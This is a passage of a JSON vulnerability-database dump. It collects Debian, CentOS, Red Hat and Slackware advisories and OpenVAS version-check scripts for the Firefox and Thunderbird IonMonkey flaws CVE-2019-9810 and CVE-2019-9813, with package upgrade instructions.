"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-11T01:29:58", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4417-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMarch 24, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : firefox-esr\nCVE ID : CVE-2019-9810 CVE-2019-9813\n\nMultiple security issues have been found in the Mozilla Firefox web\nbrowser, which could potentially result in the execution of arbitrary\ncode.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 60.6.1esr-1~deb9u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFor the detailed security status of firefox-esr please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/firefox-esr\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 20, "modified": "2019-03-24T20:16:07", "published": "2019-03-24T20:16:07", "id": "DEBIAN:DSA-4417-1:DB9AB", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00061.html", "title": "[SECURITY] [DSA 4417-1] firefox-esr security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2020-12-08T03:40:19", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "**CentOS Errata and Security Advisory** CESA-2019:0671\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-April/035295.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "edition": 5, "modified": "2019-04-01T19:07:32", "published": "2019-04-01T19:07:32", "id": "CESA-2019:0671", "href": "http://lists.centos.org/pipermail/centos-announce/2019-April/035295.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:34:05", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "**CentOS Errata and Security Advisory** CESA-2019:0672\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-April/035293.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "edition": 5, "modified": "2019-04-01T19:05:36", "published": "2019-04-01T19:05:36", "id": "CESA-2019:0672", "href": "http://lists.centos.org/pipermail/centos-announce/2019-April/035293.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:38:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2018-18509", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-5785", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506", "CVE-2018-18356"], "description": "**CentOS Errata and Security Advisory** CESA-2019:0680\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 60.6.1.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 66 and Firefox ESR 60.6 (CVE-2019-9788)\n\n* Mozilla: Use-after-free when removing in-use DOM elements (CVE-2019-9790)\n\n* Mozilla: Type inference is incorrect for constructors entered through on-stack replacement with IonMonkey (CVE-2019-9791)\n\n* Mozilla: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script (CVE-2019-9792)\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\n* Mozilla: Improper bounds checks when Spectre mitigations are disabled (CVE-2019-9793)\n\n* Mozilla: Type-confusion in IonMonkey JIT compiler (CVE-2019-9795)\n\n* Mozilla: Use-after-free with SMIL animation controller (CVE-2019-9796)\n\n* Mozilla: Proxy Auto-Configuration file can define localhost access to be proxied (CVE-2018-18506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-April/035294.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n", "edition": 7, "modified": "2019-04-01T19:06:22", "published": "2019-04-01T19:06:22", "id": "CESA-2019:0680", "href": "http://lists.centos.org/pipermail/centos-announce/2019-April/035294.html", "title": "thunderbird security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:39:42", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2018-18509", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-5785", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506", "CVE-2018-18356"], "description": "**CentOS Errata and Security Advisory** CESA-2019:0681\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 60.6.1.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 66 and Firefox ESR 60.6 (CVE-2019-9788)\n\n* Mozilla: Use-after-free when removing in-use DOM elements (CVE-2019-9790)\n\n* Mozilla: Type inference is incorrect for constructors entered through on-stack replacement with IonMonkey (CVE-2019-9791)\n\n* Mozilla: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script (CVE-2019-9792)\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\n* Mozilla: Improper bounds checks when Spectre mitigations are disabled (CVE-2019-9793)\n\n* Mozilla: Type-confusion in IonMonkey JIT compiler (CVE-2019-9795)\n\n* Mozilla: Use-after-free with SMIL animation controller (CVE-2019-9796)\n\n* Mozilla: Proxy Auto-Configuration file can define localhost access to be proxied (CVE-2018-18506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-April/035296.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n", "edition": 7, "modified": "2019-04-01T19:08:08", "published": "2019-04-01T19:08:08", "id": "CESA-2019:0681", "href": "http://lists.centos.org/pipermail/centos-announce/2019-April/035296.html", "title": "thunderbird security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:51", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9810", "CVE-2019-9813"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-03-27T11:41:25", "published": "2019-03-27T11:14:51", "id": "RHSA-2019:0671", "href": "https://access.redhat.com/errata/RHSA-2019:0671", "type": "redhat", "title": "(RHSA-2019:0671) Critical: firefox security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:11", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9810", "CVE-2019-9813"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-03-27T12:57:56", "published": "2019-03-27T12:48:21", "id": "RHSA-2019:0672", "href": "https://access.redhat.com/errata/RHSA-2019:0672", "type": "redhat", "title": "(RHSA-2019:0672) Critical: firefox security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:16", "bulletinFamily": "unix", "cvelist": ["CVE-2018-18506", "CVE-2019-9788", "CVE-2019-9790", "CVE-2019-9791", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9810", "CVE-2019-9813"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR. (BZ#1690308)\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 66 and Firefox ESR 60.6 (CVE-2019-9788)\n\n* Mozilla: Use-after-free when removing in-use DOM elements (CVE-2019-9790)\n\n* Mozilla: Type inference is incorrect for constructors entered through on-stack replacement with IonMonkey (CVE-2019-9791)\n\n* Mozilla: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script (CVE-2019-9792)\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\n* Mozilla: Improper bounds checks when Spectre mitigations are disabled (CVE-2019-9793)\n\n* Mozilla: Type-confusion in IonMonkey JIT compiler (CVE-2019-9795)\n\n* Mozilla: Use-after-free with SMIL animation controller (CVE-2019-9796)\n\n* Mozilla: Proxy Auto-Configuration file can define localhost access to be proxied (CVE-2018-18506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-05-07T08:06:15", "published": "2019-05-07T07:37:57", "id": "RHSA-2019:0966", "href": "https://access.redhat.com/errata/RHSA-2019:0966", "type": "redhat", "title": "(RHSA-2019:0966) Critical: firefox security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:32:16", "bulletinFamily": "unix", "cvelist": ["CVE-2018-18356", "CVE-2018-18506", "CVE-2018-18509", "CVE-2019-5785", "CVE-2019-9788", "CVE-2019-9790", "CVE-2019-9791", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9810", "CVE-2019-9813"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 60.6.1.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 66 and Firefox ESR 60.6 (CVE-2019-9788)\n\n* Mozilla: Use-after-free when removing in-use DOM elements (CVE-2019-9790)\n\n* Mozilla: Type inference is incorrect for constructors entered through on-stack replacement with IonMonkey (CVE-2019-9791)\n\n* Mozilla: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script (CVE-2019-9792)\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\n* Mozilla: Improper bounds checks when Spectre mitigations are disabled (CVE-2019-9793)\n\n* Mozilla: Type-confusion in IonMonkey JIT compiler (CVE-2019-9795)\n\n* Mozilla: Use-after-free with SMIL animation controller (CVE-2019-9796)\n\n* Mozilla: Proxy Auto-Configuration file can define localhost access to be proxied (CVE-2018-18506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-06-03T06:03:09", "published": "2019-03-28T16:55:12", "id": "RHSA-2019:0680", "href": "https://access.redhat.com/errata/RHSA-2019:0680", "type": "redhat", "title": "(RHSA-2019:0680) Important: thunderbird security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:30:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-18356", "CVE-2018-18506", "CVE-2018-18509", "CVE-2019-5785", "CVE-2019-9788", "CVE-2019-9790", "CVE-2019-9791", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9810", "CVE-2019-9813"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 60.6.1. (BZ#1692449)\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 66 and Firefox ESR 60.6 (CVE-2019-9788)\n\n* Mozilla: Use-after-free when removing in-use DOM elements (CVE-2019-9790)\n\n* Mozilla: Type inference is incorrect for constructors entered through on-stack replacement with IonMonkey (CVE-2019-9791)\n\n* Mozilla: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script (CVE-2019-9792)\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\n* Mozilla: Improper bounds checks when Spectre mitigations are disabled (CVE-2019-9793)\n\n* Mozilla: Type-confusion in IonMonkey JIT compiler (CVE-2019-9795)\n\n* Mozilla: Use-after-free with SMIL animation controller (CVE-2019-9796)\n\n* Mozilla: Proxy Auto-Configuration file can define localhost access to be proxied (CVE-2018-18506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-06-03T06:03:07", "published": "2019-05-13T08:51:25", "id": "RHSA-2019:1144", "href": "https://access.redhat.com/errata/RHSA-2019:1144", "type": "redhat", "title": "(RHSA-2019:1144) Important: thunderbird security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:15", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9810", "CVE-2019-9813"], "description": "New mozilla-firefox packages are available for Slackware 14.2 and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/mozilla-firefox-60.6.1esr-i686-1_slack14.2.txz: Upgraded.\n This release contains security fixes and improvements. The patched flaws\n are considered critical, and could be used to run attacker code and install\n software, requiring no user interaction beyond normal browsing.\n For more information, see:\n https://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html\n https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9810i\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9813\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-firefox-60.6.1esr-i686-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-firefox-60.6.1esr-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-60.6.1esr-i686-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-60.6.1esr-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 package:\nc37b038f81e5b07a9927ada82bb4fb4a mozilla-firefox-60.6.1esr-i686-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n8c372c3b4f4479fb2ec59b87d9460713 mozilla-firefox-60.6.1esr-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n5b03626dff034f6daf229cdc83c17ddf xap/mozilla-firefox-60.6.1esr-i686-1.txz\n\nSlackware x86_64 -current package:\na23c229838e378fc0a38e7a76c27edc1 xap/mozilla-firefox-60.6.1esr-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mozilla-firefox-60.6.1esr-i686-1_slack14.2.txz", "modified": "2019-03-22T21:29:01", "published": "2019-03-22T21:29:01", "id": "SSA-2019-081-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2019&m=slackware-security.386904", "type": "slackware", "title": "[slackware-security] mozilla-firefox", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:32:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.", "modified": "2019-05-03T00:00:00", "published": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310814942", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814942", "type": "openvas", "title": "Mozilla Thunderbird Security Updates(mfsa_2019-12_2019-12)-Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:mozilla:thunderbird\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814942\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 11:23:42 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Mozilla Thunderbird Security Updates(mfsa_2019-12_2019-12)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - IonMonkey MArraySlice has incorrect alias information and\n\n - Ionmonkey type confusion with __proto__ mutations..\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers execute arbitrary code and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Thunderbird version before 60.6.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Thunderbird version 60.6.1. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/thunderbird\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_thunderbird_detect_win.nasl\");\n script_mandatory_keys(\"Thunderbird/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\ntbVer = infos['version'];\ntbPath = infos['location'];\n\nif(version_is_less(version:tbVer, test_version:\"60.6.1\"))\n{\n report = report_fixed_ver(installed_version:tbVer, fixed_version:\"60.6.1\", install_path:tbPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:46:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310814941", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814941", "type": "openvas", "title": "Mozilla Firefox Security Updates(mfsa_2019-09_2019-10)-MAC OS X", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814941\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 10:56:20 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Mozilla Firefox Security Updates(mfsa_2019-09_2019-10)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - IonMonkey MArraySlice has incorrect alias information and\n\n - Ionmonkey type confusion with __proto__ mutations.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before 66.0.1 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 66.0.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"66.0.1\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"66.0.1\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:53:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-04-05T00:00:00", "id": "OPENVAS:1361412562310852395", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852395", "type": "openvas", "title": "openSUSE: Security Advisory for MozillaThunderbird (openSUSE-SU-2019:1152-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852395\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-05 02:00:46 +0000 (Fri, 05 Apr 2019)\");\n script_name(\"openSUSE: Security Advisory for MozillaThunderbird (openSUSE-SU-2019:1152-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1152-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-04/msg00026.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'MozillaThunderbird'\n package(s) announced via the openSUSE-SU-2019:1152-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for MozillaThunderbird fixes the following issues:\n\n Security issues fixed:\n\n - update to Mozilla Thunderbird 60.6.1 (bsc#1130262):\n\n - CVE-2019-9813: Fixed Ionmonkey type confusion with __proto__ mutations\n\n - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-1152=1\");\n\n script_tag(name:\"affected\", value:\"'MozillaThunderbird' package(s) on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird\", rpm:\"MozillaThunderbird~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-buildsymbols\", rpm:\"MozillaThunderbird-buildsymbols~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-debuginfo\", rpm:\"MozillaThunderbird-debuginfo~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-debugsource\", rpm:\"MozillaThunderbird-debugsource~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n 